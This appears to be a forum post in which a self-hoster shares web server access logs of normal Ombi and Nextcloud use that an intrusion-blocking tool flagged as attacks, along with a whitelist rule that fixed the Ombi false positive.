xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/207784 HTTP/1.1" 200 17387 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/458171 HTTP/1.1" 200 24607 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/282804 HTTP/1.1" 200 16735 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464274 HTTP/1.1" 200 17450 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9627 HTTP/1.1" 200 27384 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/19199 HTTP/1.1" 200 24705 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/207234 HTTP/1.1" 200 21472 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/210370 HTTP/1.1" 200 24290 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/302551 HTTP/1.1" 200 18473 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/114428 HTTP/1.1" 200 21482 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/5609 HTTP/1.1" 200 21907 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/325439 HTTP/1.1" 200 24196 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/121523 HTTP/1.1" 200 19659 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/173330 HTTP/1.1" 200 20875 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/434448 HTTP/1.1" 200 20410 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/1040 HTTP/1.1" 200 45393 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/3686 HTTP/1.1" 200 34423 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9347 HTTP/1.1" 200 23596 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/113332 HTTP/1.1" 200 38544 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/5608 HTTP/1.1" 200 22325 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/169818 HTTP/1.1" 200 25061 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/291345 HTTP/1.1" 200 3767 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/399377 HTTP/1.1" 200 29960 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/449345 HTTP/1.1" 200 19430 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/661818 HTTP/1.1" 200 19007 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/383934 HTTP/1.1" 200 18529 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/796975 HTTP/1.1" 200 18617 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464260 HTTP/1.1" 200 21611 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/399377 HTTP/1.1" 200 29960 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/29005 HTTP/1.1" 200 36478 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/19597 HTTP/1.1" 200 5371 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/400574 HTTP/1.1" 200 41162 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/21220 HTTP/1.1" 200 76695 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/75686 HTTP/1.1" 200 4360 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/10918 HTTP/1.1" 200 60954 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/41571 HTTP/1.1" 200 27939 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/89293 HTTP/1.1" 200 20731 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/63307 HTTP/1.1" 200 17672 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/95226 HTTP/1.1" 200 76706 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/105875 HTTP/1.1" 200 23833 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/111115 HTTP/1.1" 200 72639 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/66324 HTTP/1.1" 200 62873 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/117883 HTTP/1.1" 200 9245 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/66312 HTTP/1.1" 200 46578 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /images/default_movie_poster.png HTTP/1.1" 404 575 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/64190 HTTP/1.1" 200 1214797 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"

following whitelist rule fixed this:
- “evt.Parsed.request contains ‘/ombi/api/v2/search’”

here is me getting blocked while using nextcloud:

xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings_apps/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/comments/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/cookbook/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/files/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 2030 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/circles/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck-comment/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-conversations/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/contacts/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/calendar/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/tasks/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/jitsi/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/notes/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/poll/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message-current/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/x-office-document.svg?v=0 HTTP/1.1" 200 1299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/SyncPC/Documents HTTP/1.1" 207 6320 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/SyncPC/Pictures HTTP/1.1" 207 1178 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/.Notes HTTP/1.1" 207 1169 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=254153 HTTP/1.1" 200 1387 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=250723 HTTP/1.1" 200 5103 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/cookbook/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/Stamm HTTP/1.1" 207 1171 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings_apps/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=249763 HTTP/1.1" 200 2097 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/Ma+Ri HTTP/1.1" 207 1173 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/circles/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/comments/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/LB.systems HTTP/1.1" 207 1173 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/files/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1537 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck-comment/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-conversations/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/contacts/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/calendar/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/tasks/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/notes/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/jitsi/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/poll/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message-current/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
